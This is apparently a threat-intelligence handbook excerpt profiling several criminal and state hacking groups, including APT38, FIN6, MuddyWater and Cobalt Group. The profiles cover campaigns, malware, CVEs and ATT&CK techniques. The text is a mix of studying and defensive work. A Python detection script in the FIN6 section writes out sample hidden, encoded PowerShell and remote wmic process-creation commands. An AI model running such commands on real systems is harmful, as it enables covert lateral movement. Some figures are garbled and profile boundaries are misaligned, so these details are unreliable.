The report from the UN Security Council said that North Korea is carrying out “widespread and increasingly sophisticated” cyberattacks and estimates that North Korea has generated $2 billion.
As a reminder, since 2009, relations between the West and North Korea have oscillated between tension and calm, while the latter is under embargo and held by the throat. To calm its enemy, the United States provided food aid in exchange for a restraint effort. Despite this, aid is not sufficient, and Korea has no choice but to reiterate its pressure through missile fire or through dangerous barter. For example, for decades North Korea has traded arms with countries such as Syria, Iran, Congo, Burma, Eritrea and Yemen in exchange for food. The cyber tool is suitable in this respect since it allows profits to be made with relative discretion.

TOOLS, MALWARES AND VULNERABILITIES


Malwares: DarkComet, DYEPACK, HERMES, HOTWAX, KillDisk, KEYLIME, JspSpy, MAPMAKER, NACHOCHEESE, NESTEGG, QUICKCAFE, QUICKRIDE, RATANKBAPOS, RAWHIDE, REDSHAWL, SCRUBBRUSH, SHADYCAT, SLIMDOWN, SMOOTHRIDE, SORRYBRUTE, WHITEOUT, WORMHOLE, WannaCry
Legitimate software: Net, Sysmon
Exploited vulnerabilities: CVE-2016-1019, CVE-2015-8651, CVE-2016-4119



Targeted Countries _
Bangladesh, Brazil, Chile, Malaysia, Mexico, North Korea, Philippines, Poland, Russia, Taiwan, Turkey, United States, Uruguay, Vietnam

Assumed origin of the attacker: North Korea

CAMPAIGNS
February 2014 - Attack of the Southeast Asian bank
APT38 targeted the Southeast Asian bank using the malware NESTEGG and KEYLIME, which were specifically crafted to impact financial systems. During this attack APT38 seemed to be still learning about various systems related to financial transactions.

December 2015 - Attempted heist at TPBank
The Vietnamese bank TPBank blocked $1.36 of SWIFT transfers in December 2015.

January 2016 - Multiple international bank heist

February 2016 - Bangladesh bank heist
In February 2016, APT38 initiated thirty-five fraudulent transactions worth $851m. While most of them were blocked or recovered, $81m were successfully transferred to the Philippines, laundered through casinos and transferred to Hong Kong.

October 2016 - Watering hole attacks on government and media sites

May 2017 - WannaCry
In May 2017, APT38 launched a massive global cyber-attack with the WannaCry malware, affecting more than 230,000 computers in more than 150 countries, mainly in India, the United States and Russia, using the obsolete Windows XP system and more generally all versions prior to Windows 10 that had not performed security updates, in particular that of March 14, 2017 (security bulletin MS17-010). This cyber-attack is considered to be the biggest ransom piracy in the history of the Internet, with the European Police Office Europol describing it as "unprecedented". Among the most important organisations affected by this attack are the companies Vodafone, FedEx, Renault, Telefónica, the National Health Service, the Centre Hospitalier Universitaire of Liège, the Russian Ministry of the Interior and the Deutsche Bahn.

October 2017 - Far Eastern International Bank heist

January 2018 - Attempted heist at Bancomext
In January 2018, APT38 attempted to steal $110m from the Mexican commercial bank Bancomext. The operation failed, but APT38 used a wiper called KillDisk to cover their tracks.

April 2018 - Attack on three Mexico banks

May 2018 - Heist at Banco de Chile
In May 2018, APT38 successfully stole $10m from Chile's largest bank, Banco de Chile. This attack was followed by the compromise of 9000 Windows computers and 500 Windows servers by the destructive malware KillDisk.

Timeline (figure): Feb-2014 Attack of the Southeast Asian bank; Dec-2015 Attempted heist at TPBank; Jan-2016 Multiple international bank heist; Feb-2016 Bangladesh bank heist; Oct-2016 Watering hole attacks on government and media sites; May-2017 WannaCry; Oct-2017 Far Eastern International Bank heist; Jan-2018 Attempted heist at Bancomext; Apr-2018 Attack on three Mexico banks; May-2018 Heist at Banco de Chile.

MODUS OPERANDI (ATT&CK FRAMEWORK)


Initial Access
T1078 - Valid Accounts
T1189 - Drive-by Compromise
T1190 - Exploit Public-Facing Application
T1193 - Spearphishing Attachment

Execution
T1204 - User Execution

Persistence
T1050 - New Service
T1060 - Registry Run Keys / Startup Folder
T1078 - Valid Accounts

Privilege Escalation
T1050 - New Service
T1055 - Process Injection
T1078 - Valid Accounts

Defense Evasion
T1027 - Obfuscated Files or Information
T1036 - Masquerading
T1045 - Software Packing
T1055 - Process Injection
T1078 - Valid Accounts
T1099 - Timestomp
T1107 - File Deletion
T1112 - Modify Registry
T1140 - Deobfuscate/Decode Files or Information

Credential Access
T1003 - Credential Dumping
T1056 - Input Capture

Discovery
T1046 - Network Service Scanning
T1057 - Process Discovery
T1063 - Security Software Discovery
T1082 - System Information Discovery
T1083 - File and Directory Discovery
T1087 - Account Discovery
T1135 - Network Share Discovery

Lateral Movement
T1076 - Remote Desktop Protocol

Collection
T1056 - Input Capture
T1123 - Audio Capture

Command and Control
T1043 - Commonly Used Port
T1065 - Uncommonly Used Port
T1071 - Standard Application Layer Protocol
T1079 - Multilayer Encryption
T1090 - Connection Proxy

Impact
T1485 - Data Destruction
T1492 - Stored Data Manipulation

Alias _
ATK 88, FIN6, SKELETON SPIDER, TAG-CR2
Score: 68

Targeted Sectors _
Energy, Hospitality, Retail

Motivations & Objectives _
Organizational gain

Language: English, Russian

DESCRIPTION
FIN6 is a cybercrime group active since at least 2015 and focuses mostly on the financial sector. Their claim to fame is in attacking Point-of-Sale systems and stealing credit card data from them. Millions of cards were stolen using this method in recent years, and subsequently found to be sold on the dark web. Furthermore, in some cases, if they are unable to steal this data, they move to target card-not-present (CNP) data. They usually use specific POS malware, and their victims are companies that have many transactions. Therefore, most of their activity is against victims in the US and Europe. Of note, since mid-2018, it was spotted that the group has started to deploy ransomware on non-Ecommerce networks.

CAMPAIGNS
2015
FIN6 had aggressively targeted and compromised point-of-sale (POS) systems, resulting in the theft of millions of credit cards. In this case, most of the cards were stolen using the GRABNEW malware, which after lateral movement led to the downloading of POS malware called AbaddonPOS. Following the successful theft, the cards were posted on Dark Web marketplaces that specialize in credit cards, which continued for several months until the victims’ networks were clean.

June 2016
FIN6 were able to deploy FrameworkPOS to steal over 300 credit card records from two victims, namely an SMB based in Honolulu, Hawaii, and another based in Chicago. This campaign is not as widespread as their other campaigns.

September 2018
The group was found to use the same TTP as in the original campaign that was recognized in 2016; however, this time it used WMIC to execute PowerShell commands and scripts automatically. The victims in this case were point-of-sale systems in the USA and Europe.

Since July 2018 - ongoing
The group has started to deploy ransomware on non-ecommerce networks, especially the Ryuk and LockerGoga ransomware. At the beginning they attacked an Internet-facing system, and then used stolen credentials to move laterally through the system.

End of 2018
The group sent malicious documents with a link to a malicious server that allowed the execution of PowerShell scripts to multiple high-value ecommerce merchants, which gave them access to their internal network.

Timeline (figure): 2015 FIN6 had aggressively targeted and compromised point-of-sale; Jun-2016 FIN6 were able to deploy FrameworkPOS to steal over 300 credit card records from two victims; July-2018 The group has started to deploy ransomware on non-ecommerce networks; Sep-2018 The group was found to use the same TTP as in the original campaign that was recognized in 2016; End of 2018 The group sent malicious documents with a link to a malicious server.
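The September 2018 behaviour above (WMIC launching PowerShell, ATT&CK T1047 followed by T1086) leaves a distinctive parent/child trace in process-creation telemetry. The following is an added detection example, not code from the handbook or from the group; the events are constructed in the shape of Sysmon Event ID 1 fields, and the host names, PIDs and paths are made up.

```python
"""Detection sketch for wmic.exe launching PowerShell (T1047 -> T1086),
locally or through a remote 'process call create'. Added example; the
sample events below are constructed, not real telemetry."""
from dataclasses import dataclass
import ntpath
import re


@dataclass(frozen=True)
class ProcessEvent:
    host: str
    pid: int
    parent_image: str   # full path of the parent process
    image: str          # full path of the created process
    command_line: str


# PowerShell switches that take a base64 script: -e, -ec, -en, -enc, -encodedcommand
ENCODED_FLAG = re.compile(r"(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\b", re.IGNORECASE)

POWERSHELL = {"powershell.exe", "pwsh.exe"}


def _exe(path: str) -> str:
    """Lower-cased file name of a Windows path (ntpath handles backslashes on any OS)."""
    return ntpath.basename(path).lower()


def is_wmic_spawning_powershell(ev: ProcessEvent) -> bool:
    """Local variant: a PowerShell process whose parent is wmic.exe."""
    return _exe(ev.parent_image) == "wmic.exe" and _exe(ev.image) in POWERSHELL


def is_remote_wmic_process_call(ev: ProcessEvent) -> bool:
    """Remote variant: 'wmic /node:<host> process call create ...' seen on the source host."""
    cl = ev.command_line.lower()
    return (_exe(ev.image) == "wmic.exe"
            and "/node:" in cl
            and re.search(r"\bprocess\s+call\s+create\b", cl) is not None)


def triage(events):
    """Return (host, pid, reasons) for every event matching at least one rule."""
    findings = []
    for ev in events:
        reasons = []
        if is_wmic_spawning_powershell(ev):
            reasons.append("T1047->T1086: PowerShell spawned by wmic.exe")
            if ENCODED_FLAG.search(ev.command_line):
                reasons.append("T1027: encoded PowerShell command line")
        if is_remote_wmic_process_call(ev):
            reasons.append("T1047: wmic remote 'process call create'")
        if reasons:
            findings.append((ev.host, ev.pid, reasons))
    return findings


# Constructed sample telemetry. Host names, PIDs and the base64 blob are made up;
# the blob decodes to the harmless UTF-16 string "AAAA".
SAMPLE_EVENTS = [
    ProcessEvent("POS-TERMINAL-07", 4412,
                 r"C:\Windows\System32\wbem\WMIC.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -nop -w hidden -enc QQBBAEEAQQA="),
    ProcessEvent("ADMIN-WS-01", 988,
                 r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\wbem\WMIC.exe",
                 'wmic /node:POS-TERMINAL-07 process call create "powershell.exe -nop -w hidden -enc QQBBAEEAQQA="'),
    ProcessEvent("ADMIN-WS-01", 1204,          # benign: admin script started from Explorer
                 r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
    ProcessEvent("POS-TERMINAL-07", 2100,      # benign: local inventory query
                 r"C:\Windows\System32\services.exe",
                 r"C:\Windows\System32\wbem\WMIC.exe",
                 "wmic os get caption"),
]

if __name__ == "__main__":
    for host, pid, reasons in triage(SAMPLE_EVENTS):
        print(f"{host} pid={pid}: " + "; ".join(reasons))
```

The two benign events show the rule keys on the parent/child pair and the remote-creation verb, not on the mere presence of wmic.exe or PowerShell.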

TOOLS, MALWARES AND VULNERABILITIES


Malwares
Custom tools: GRABNEW (NEVERQUEST, VAWTRAK) - Used to harvest account details; GratefulPOS - POS malware deployed to steal payment information; AbaddonPOS - POS malware deployed to steal payment information; HARDTACK - Downloader; SHIPBREAD - Downloader; TRINITY - POS malware
Tools used by multiple adversaries: LockerGoga - Used to encrypt the victim’s device; FrameworkPOS (TRINITY); More_Eggs (Terra Loader); flawedammyy; Ryuk
Publicly available tools: Cobalt Strike; metasploit
Legitimate software: PsExec, Windows Credential Editor, PowerShell, Query Express, Adfind
Exploited vulnerabilities: CVE-2010-4398, CVE-2011-2005, CVE-2013-3660



Targeted Countries _
Europe, United States

Assumed origin of the attacker: Unknown

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1078 - Valid Accounts

Execution
T1035 - Service Execution
T1047 - Windows Management Instrumentation
T1053 - Scheduled Task
T1064 - Scripting
T1086 - PowerShell

Persistence
T1053 - Scheduled Task
T1060 - Registry Run Keys / Startup Folder
T1078 - Valid Accounts

Privilege Escalation
T1053 - Scheduled Task
T1055 - Process Injection
T1068 - Exploitation for Privilege Escalation
T1078 - Valid Accounts

Defense Evasion
T1036 - Masquerading
T1055 - Process Injection
T1064 - Scripting
T1078 - Valid Accounts
T1102 - Web Service

Credential Access
T1003 - Credential Dumping
T1040 - Network Sniffing

Discovery
T1018 - Remote System Discovery
T1040 - Network Sniffing
T1046 - Network Service Scanning
T1069 - Permission Groups Discovery
T1087 - Account Discovery

Lateral Movement
T1076 - Remote Desktop Protocol

Collection
T1074 - Data Staged
T1119 - Automated Collection

Command and Control
T1032 - Standard Cryptographic Protocol
T1071 - Standard Application Layer Protocol
T1102 - Web Service

Exfiltration
T1002 - Data Compressed
T1022 - Data Encrypted
T1048 - Exfiltration Over Alternative Protocol

Alias _
ATK113, FIN8
Score: 68

Targeted Sectors _
Entertainment, Food and Agriculture, Healthcare, Hospitality, Retail

Motivations & Objectives _
Financial Gain

Language: Unknown

DESCRIPTION
FIN8 is a financially motivated group targeting the retail, hospitality and entertainment industries. The actor had previously conducted several tailored spearphishing campaigns using the downloader PUNCHBUGGY and POS malware PUNCHTRACK.

CAMPAIGNS
ATK113 (FIN8) targets retail, restaurant and hospitality industries in North America
In March 2016, a financially motivated threat actor launched several tailored spear phishing campaigns primarily targeting the retail, restaurant, and hospitality industries. More than 100 organizations in North America fell victim to this campaign.

ATK113 targets Retail Point-Of-Sale (PoS)
ATK113 launched an advanced, targeted PoS intrusion focused on harvesting payment card information for exfiltration.

ATK113 targets hotel-entertainment industry
During the period of March to May 2019, Morphisec Labs observed a new, highly sophisticated variant of the ShellTea/PunchBuggy backdoor malware that attempted to infiltrate a number of machines within the network of a customer in the hotel-entertainment industry.

Timeline (figure): Mar-2016 ATK113 (FIN8) targets retail, restaurant and hospitality industries in North America; Jun-2017 ATK113 targets Retail Point-of-Sale (PoS); Mar-2019 ATK113 targets hotel-entertainment industry.

TOOLS, MALWARES AND VULNERABILITIES


Malwares: PUNCHBUGGY, PUNCHTRACK
Legitimate software: dsquery, Net
Exploited vulnerabilities: CVE-2016-0167



Targeted Countries _
North America

Assumed origin of the attacker: Unknown

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access
T1078 - Valid Accounts
T1192 - Spearphishing Link
T1193 - Spearphishing Attachment

Execution
T1047 - Windows Management Instrumentation
T1053 - Scheduled Task
T1059 - Command-Line Interface
T1064 - Scripting
T1086 - PowerShell
T1204 - User Execution

Persistence
T1053 - Scheduled Task
T1078 - Valid Accounts

Privilege Escalation
T1053 - Scheduled Task
T1068 - Exploitation for Privilege Escalation
T1078 - Valid Accounts

Defense Evasion
T1027 - Obfuscated Files or Information
T1064 - Scripting
T1070 - Indicator Removal on Host
T1078 - Valid Accounts
T1107 - File Deletion
T1112 - Modify Registry

Credential Access
T1003 - Credential Dumping

Discovery
T1018 - Remote System Discovery
T1063 - Security Software Discovery

Lateral Movement
T1076 - Remote Desktop Protocol
T1077 - Windows Admin Shares
T1105 - Remote File Copy

Collection
T1074 - Data Staged

Command and Control
T1032 - Standard Cryptographic Protocol
T1043 - Commonly Used Port
T1105 - Remote File Copy

Exfiltration
T1002 - Data Compressed
T1048 - Exfiltration Over Alternative Protocol

Alias _
APT-C-23, ATK 66, ARID VIPER, BIG BANG APT, DESERT FALCONS, TAG-CT1, TWO-TAILED SCORPION
Score: 67

Targeted Sectors _
Administration, Defense, Education, Government Agencies, Media, Military, Political Organizations, Transportation

Motivations & Objectives _
Ideology

Language: Arabic

DESCRIPTION
APT-C-23 is commonly considered an APT group linked to the Hamas organization ruling the Gaza Strip. Reportedly, the group was established in 2011, but became active starting from 2014, when the first attacks were detected in the wild. By examining the group’s victims and its TTPs, it is apparent the group mainly attacks targets related to the Palestinian Authority. APT-C-23 members are native Arabic speakers from the Middle East. According to Kaspersky, at its origins, APT-C-23 consisted of 30 members working in three teams and operating mainly out of the Palestinian Territories, Egypt and Turkey.

CAMPAIGNS
2015 - Operation Arid Viper
A targeted campaign against targets in Israel from the government, defense, transportation, critical infrastructure and academia sectors. The group mainly used spear-phishing emails with a compressed .RAR attachment including a decoy file and the malware (using the Skype icon and name in some cases). After a successful infection the group used its access to steal documents.

2015 - Operation Advtravel, an offshoot of the Arid Viper campaign
Using some of the same infrastructure to attack victims mainly in Egypt.

2017 - KASPERAGENT/Micropsia Malware Campaign
A malware campaign against targets in the United States, Israel, Egypt and the Palestinian Territories. The threat actors used four different malware, two for Microsoft Windows systems and two for Android systems. To infect users, the group used both spear-phishing and fake news websites while exploiting URL shortening services.

2018 - GnatSpy Campaign Targets the Palestinian Authority
A mobile malware campaign distributing the GnatSpy strain.

2018 - Big Bang Campaign
A highly targeted malware (infostealer) campaign against the Palestinian Authority.

2019 - New Micropsia Campaign
A campaign spreading the Micropsia malware, first discovered in the group's 2017 attack campaign. In the current campaign the group used a decoy document allegedly sent from the general security wing of Hamas, which discusses alleged financial deviations spotted among high-ranking officers.

Timeline (figure): 2015 Operation Arid Viper; 2015 Operation Advtravel, an offshoot of the Arid Viper campaign; 2017 KASPERAGENT/Micropsia Malware Campaign; 2018 GnatSpy Campaign Targets the Palestinian Authority; 2018 Big Bang Campaign, a highly targeted malware (infostealer) campaign against the Palestinian Authority; 2019 New Micropsia Campaign.

TOOLS, MALWARES AND VULNERABILITIES


Malwares
Custom tools: DHS Spyware, DHS 2015, iRat, Falcon Trojan, KASPERAGENT, MICROPSIA, SECUREUPDATE, VAMP, FrozenCell, GnatSpy
Tools used by multiple adversaries: None Identified
Publicly available tools: None Identified

Legitimate software: bit.ly URL shortening services (used to disguise the true links sent in spear phishing emails), WinRAR

Exploited vulnerabilities: CVE-2018-8453

58 The Cyberthreat Handbook • Thales - Verint


Targeted Countries _ Egypt, Israel, Jordan, Kuwait, Palestinian Authority, Qatar, United States

Assumed origin of the attacker _ Gaza Strip

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access: T1078 - Valid Accounts; T1189 - Drive-by Compromise; T1192 - Spearphishing Link; T1193 - Spearphishing Attachment; T1194 - Spearphishing via Service
Execution: T1204 - User Execution
Persistence: T1060 - Registry Run Keys / Startup Folder; T1078 - Valid Accounts
Privilege Escalation: T1078 - Valid Accounts
Defense Evasion: T1078 - Valid Accounts
Credential Access: T1056 - Input Capture
Lateral Movement: T1105 - Remote File Copy
Collection: T1005 - Data from Local System; T1025 - Data from Removable Media; T1056 - Input Capture; T1113 - Screen Capture; T1119 - Automated Collection; T1123 - Audio Capture
Command and Control: T1001 - Data Obfuscation; T1071 - Standard Application Layer Protocol; T1105 - Remote File Copy
Exfiltration: T1002 - Data Compressed; T1041 - Exfiltration Over Command and Control Channel

Alias _ ATK 126, Clement02, Clem02100, Clement02100, JiiN, JiiN02100, Sparks™, TAG CR9
Score _ 67
Threat Actor _ Cyber Criminal
Targeted Sectors _ End Users
Motivations & Objectives _ Personal-gain
Language _ English

DESCRIPTION
JiiN is a top member of a hacking forum that we monitor, where he has been active since July 2, 2010. Since that time, he has created 65 threads and 1,028 posts under two different pseudonyms (JiiN and Clement02). The analysis we performed on JiiN's activity on the forum shows he is generally online seven days a week, from 1:00 to 13:00 UTC/GMT+0 (twelve hours on average), and he is likely a French speaker (in an early post, he saluted other French members) but, interestingly, refrains from writing posts in French. We assess that these regularities in JiiN's activity patterns might indicate he works office hours and that engaging in cybercrime is his main occupation. A review conducted on his copious publications revealed that JiiN is a fervent gamer, as well as a malware developer. The threat actor has been mainly advertising "crypters" (software used for obfuscating other malware in order to evade detection) and cryptocurrency miners since his early stages in the cybercrime underground. Of note, JiiN regularly receives positive feedback for his malware projects, and therefore enjoys a very positive reputation in the underground community. Since 2017, the threat actor has advertised three main products, which are also offered for sale on a popular e-commerce platform on the Clearnet: MinerGate Silent Miner, Coak Crypter, and NiiJ Stealer. The three malware strains are still up for sale at the time of writing. Moreover, we have also retrieved and analyzed an allegedly unknown malware we dubbed Cassandra Stealer from a domain under JiiN's control.

TOOLS, MALWARES AND VULNERABILITIES


Malwares
Custom tools: MinerGate Silent Miner, Coak Crypter, NiiJ Stealer, Cassandra Stealer
Tools used by multiple adversaries: Beta Bot, Blackshades RAT, NetWire RAT
Publicly available tools: Absolute Crypter, Infinity Crypter

Legitimate software: No-IP (JiiN allegedly uses the No-IP dynamic DNS provider to make his dynamic IP address act as though it is static, enabling his malware operations)

Exploited vulnerabilities: WordPress



Targeted Countries _ France

Assumed origin of the attacker _ France

CAMPAIGNS
February 2013 - BlackShades RAT Campaign
In a 2013 forum post, JiiN admits spreading the Blackshades RAT via torrent, after crypting the malware with several crypters he purchased. The malware is typically bundled with legitimate software, such as Flash Player. The threat actor complains about the low infection rates gained through this spreading method.
Moreover, JiiN was observed spreading RATs bundled with Flash Player via weaponized Wideo videos (wideo[.]fr). The French video-sharing platform no longer exists. It was a YouTube-like platform but used Flash videos (instead of the current HTML5). In order to spread malware, JiiN created fake videos that could not be viewed without installing the Flash Player. When playing the video, the victims would be redirected to a fake (malicious) Flash Player download, hosted on Dropbox.

2013 - Cryptomining Campaign
JiiN has affirmed on several occasions that he had been using bots (an "army" of infected computers under his control) to mine cryptocurrencies, notably BTC. Allegedly, he has done so by using the Triplemining pool because of its loose oversight of illicit activity.
Of note, infecting computers for cryptomining purposes has apparently been a mainstay of JiiN's criminal activity. In this regard, he even developed his own cryptominer, named "Minergate Silent Miner," put up for sale in October 2017. There is also evidence that JiiN has been partnering with other threat actors for spreading cryptomining malware.

2014 - NetWire RAT Campaign
JiiN was noted using NetWire RAT in mid-2014, even asking for help solving technical issues he encountered. Of note, together with cryptomining, RAT spreading has been a staple of the threat actor's illicit activity since the beginning of his cybercriminal "career."

October 2017 - Minergate Silent Miner Sales Operation
On October 25, 2017, JiiN created his first malware listing for his self-developed cryptominer, named Minergate Silent Miner, in the market section of a prominent English-language hacking forum. The malware is coded in .NET 2.0 and works with the Minergate pool. Ostensibly, more than 200 customers have bought the malware in the past two years, leaving very positive feedback, both about the product and the support provided by JiiN.

August 2018 - Coak Crypter Sales Operation
On August 26, 2018, JiiN created a listing for his Coak Crypter v2.5, a malware used to make other malware undetectable by AV software and Windows Defender (FUD), in the market section of a prominent English-language hacking forum. In this case, JiiN received mixed feedback; nonetheless the product is still up for sale after more than one year.

July 2019 - NiiJ Stealer Sales Operation
On July 26, 2019, JiiN created a sales thread for his new infostealer, named NiiJ Stealer (V1.5), in the market section of a prominent English-language hacking forum. Of note, JiiN also sells the malware on an e-commerce platform broadly used for illicit purposes. We also detected a proprietary website JiiN uses for advertising his malware. NiiJ Stealer is written in .NET, and its key function is to steal information from three distinct browsers (Firefox, Chrome, Opera), the open-source FileZilla FTP client, and the Pidgin chat client, in addition to implementing the No-IP dynamic DNS service. The threat actor offers a lifetime license, which includes the malware builder and the PHP/SQL files related to its control panel (CP), for US$ 35. Based on the results of the AV scanning uploaded by JiiN in the sales thread, as at August 7, 2019, NiiJ Stealer was undetected (FUD) by major AV software.

Timeline: Feb-2013 BlackShades RAT campaign; 2013 Cryptomining campaign; 2014 NetWire RAT campaign; Oct-2017 Minergate Silent Miner sales operation; Aug-2018 Coak Crypter sales operation; Jul-2019 NiiJ Stealer sales operation.

MODUS OPERANDI (ATT&CK FRAMEWORK)


Initial Access: T1189 - Drive-by Compromise
Execution: T1204 - User Execution
Persistence: T1060 - Registry Run Keys / Startup Folder
Privilege Escalation: T1050 - New Service; T1055 - Process Injection
Defense Evasion: T1093 - Process Hollowing; T1140 - Deobfuscate/Decode Files or Information
Credential Access: T1003 - Credential Dumping; T1056 - Input Capture; T1081 - Credentials in Files
Lateral Movement: T1105 - Remote File Copy
Collection: T1005 - Data from Local System; T1039 - Data from Network Shared Drive; T1056 - Input Capture; T1074 - Data Staged; T1113 - Screen Capture; T1119 - Automated Collection
Command and Control: T1032 - Standard Cryptographic Protocol; T1043 - Commonly Used Port; T1071 - Standard Application Layer Protocol; T1090 - Connection Proxy; T1105 - Remote File Copy
Exfiltration: T1020 - Automated Exfiltration; T1022 - Data Encrypted; T1041 - Exfiltration Over Command and Control Channel

Alias _ ATK51, MUDDYWATER, MOBHAM, NTSTATS, POWERSTATS, SEEDWORM, STATIC KITTEN, TEMP.ZAGROS
Score _ 66
Targeted Sectors _ Defence, Education, Energy, Financial Services, Government Agencies, Healthcare, High-Tech, International Organizations, Media
Motivations & Objectives _ Espionage
Language _ Unknown

DESCRIPTION
ATK51 attacks are primarily against Middle Eastern nations. However, we have also observed attacks against surrounding nations and beyond, including targets in India and the USA. MuddyWater attacks are characterized by the use of a slowly evolving PowerShell-based first stage backdoor we call "POWERSTATS". Despite broad scrutiny and reports on MuddyWater attacks, the activity continues with only incremental changes to the tools and techniques.

CAMPAIGNS
MuddyWater targets Middle East, USA and India
The attackers behind MuddyWater have been active throughout 2017, with targets across the Middle East and surrounding areas. The countries targeted were Saudi Arabia, Iraq, Israel, United Arab Emirates, Georgia, India, Pakistan, Turkey and the USA.

ATK51: Seedworm's Powermud backdoor campaign
The Seedworm campaign (ATK51) took place between the end of September 2018 and mid-November of the same year. In all, 131 victims were infected with the Powermud backdoor according to Symantec. They were mainly in Pakistan and Turkey. There are also organizations that have been victims of this backdoor in Russia, Saudi Arabia, Afghanistan, Jordan and other countries.
European and North American organizations have also been compromised, their common denominator being their link with the Middle East.
Among the sectors affected are telecommunications and IT services. There are also victims in the oil and gas sector, more specifically companies linked to a large Russian group operating in the Middle East. The other victims of the energy sector are in North America, the Middle East, Africa and Asia. Victims also include Middle Eastern universities and Middle Eastern embassies based in Europe. Finally, two large NGOs were compromised, as well as victims working for global public health organizations.

MuddyWater Operations in Lebanon and Oman
At the end of 2018 ATK51 targeted victims, probably from Lebanon and Oman, while exploiting compromised domains, one of which belongs to an Israeli web developer. Depending on each sample, the content of the document is either a false curriculum vitae or a letter from the Ministry of Justice in Lebanon or Saudi Arabia.

ATK51 updates its TTP in Spear Phishing Campaign to target Asia and Middle East
From January 2018 to March 2018, FireEye observed ATK51 (MuddyWater) leveraging the latest code execution and persistence techniques to distribute malicious macro-based documents to individuals in Asia and the Middle East.
From January 23 to February 26, 2018: Turkey, Pakistan, Tajikistan.
From February 27 to March 5, 2018: India, Pakistan, Turkey.

After MuddyWater, ATK51 led a new and broader campaign in early 2018
In March 2018, Trend Micro provided an analysis of another campaign that bore the hallmarks of MuddyWater. Instead of using government or telecommunication-related documents, the new lure is presented as a reward or promotion, which could indicate that the targets are no longer limited to specific industries or organizations.

TOOLS, MALWARES AND VULNERABILITIES


Malwares: MuddyC3, POWERSTATS
Legitimate software: LaZagne, Mimikatz
Exploited vulnerabilities: None



Targeted Countries _ Austria, Azerbaijan, Bahrain, Asia, Eastern Europe, Georgia, India, Iran, Israel, Iraq, Jordan, Mali, Middle East, North America, Pakistan, Russia, Saudi Arabia, Southern Asia, Turkey, United States, United Arab Emirates, Western Europe

Assumed origin of the attacker _ Iran

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access: T1193 - Spearphishing Attachment
Execution: T1047 - Windows Management Instrumentation; T1059 - Command-Line Interface; T1064 - Scripting; T1085 - Rundll32; T1086 - PowerShell; T1170 - Mshta; T1173 - Dynamic Data Exchange; T1191 - CMSTP; T1204 - User Execution
Persistence: T1060 - Registry Run Keys / Startup Folder
Privilege Escalation: T1088 - Bypass User Account Control
Defense Evasion: T1027 - Obfuscated Files or Information; T1036 - Masquerading; T1064 - Scripting; T1085 - Rundll32; T1088 - Bypass User Account Control; T1140 - Deobfuscate/Decode Files or Information; T1170 - Mshta; T1191 - CMSTP; T1500 - Compile After Delivery
Credential Access: T1003 - Credential Dumping; T1081 - Credentials in Files
Discovery: T1016 - System Network Configuration Discovery; T1033 - System Owner/User Discovery; T1057 - Process Discovery; T1063 - Security Software Discovery; T1082 - System Information Discovery; T1083 - File and Directory Discovery
Lateral Movement: T1105 - Remote File Copy; T1175 - Distributed Component Object Model
Collection: T1113 - Screen Capture
Command and Control: T1090 - Connection Proxy; T1104 - Multi-Stage Channels; T1105 - Remote File Copy
Exfiltration: T1002 - Data Compressed

Alias _ ATK 67, COBALT GROUP, COBALT GANG, COBALT SPIDER, GOLD KINGSWOOD, TAG-CR3
Score _ 66
Threat Actor _ Cyber Criminal
Targeted Sectors _ Financial Services, High-Tech, Media, Retail
Motivations & Objectives _ Personal-gain
Language _ Russian

DESCRIPTION
Cobalt group is considered to be a highly advanced financial actor. The group's targets come mostly from the financial sector, with a strong focus on banks and ATM services in Eastern Europe and Asia. Cobalt was first spotted in 2016 in an attack against a bank in Russia and, although the group leader was arrested in Spain, the group is still considered to be active. The group uses a variety of attack tools, including tools developed in house. Furthermore, part of the group's tactics is to attack the supply chain of its targets.

CAMPAIGNS
June - August 2016 - Attacks Against Banks' ATMs
Between June and August 2016, the group carried out several attacks against bank networks in order to gain access and steal money from the institutions' ATM machines.

2017 - Spear Phishing Campaigns
Throughout 2017, Cobalt Group distributed a large number of spear phishing campaigns. The targets of the campaigns were various financial institutions and their supply chain. The campaigns combined some sort of social engineering and different known exploits, mostly for Microsoft Word. However, in some cases a malicious macro was used instead of exploits. A successful infection ends with the installation and execution of different tools and malware such as Cobalt Strike, AmmyyRAT, Metasploit and more.

2018 - Spear Phishing Campaigns Continue
Despite the arrest of the group leader in March 2018, attacks by the group continued throughout 2018. The attacks use mostly the same TTPs: spear phishing that leads to an exploit which ends with the download and execution of malware. In several cases Cobalt group has used dedicated in-house developed tools and also the exploit kit ThreadKit in order to spread those tools. Regarding its targets, the group continued to focus on the financial sector, mostly in Eastern Europe.

Timeline: Jun-Aug-2016 Attacks Against Banks' ATMs; 2017 Spear Phishing Campaigns; 2018 Spear Phishing Campaigns Continue.

TOOLS, MALWARES AND VULNERABILITIES


Malwares
Custom tools: More_eggs, ATMSpitter, ATMRipper, CobInt, Cyst Downloader, SpicyOmelette
Tools used by multiple adversaries: AmmyyRAT, Microsoft Word Intruder, ThreadKit builder
Publicly available tools: Cobalt Strike, Mimikatz, Metasploit, AlexusMailer

Legitimate software: PsExec, SDelete, SoftPerfect Network Scanner, PowerShell, CMSTP, Regsvr32, odbcconf, TeamViewer, Ammyy Admin, msxsl

Exploited vulnerabilities: CVE-2017-8759, CVE-2017-11882, CVE-2012-0158, CVE-2017-0199, CVE-2018-0802, CVE-2015-1641, CVE-2017-8570, CVE-2017-0262



Targeted Countries _ Argentina, Armenia, Austria, Azerbaijan, Belarus, Bulgaria, Canada, China, Czech Republic, Estonia, Georgia, Italy, Jordan, Kazakhstan, Kuwait, Kyrgyzstan, Malaysia, Moldova, Netherlands, Poland, Romania, Russia, Spain, Taiwan, Tajikistan, Thailand, Turkey, United Kingdom, United States, Ukraine, Vietnam

Assumed origin of the attacker _ Spain, Ukraine

MODUS OPERANDI (ATT&CK FRAMEWORK)

Initial Access: T1192 - Spearphishing Link; T1193 - Spearphishing Attachment
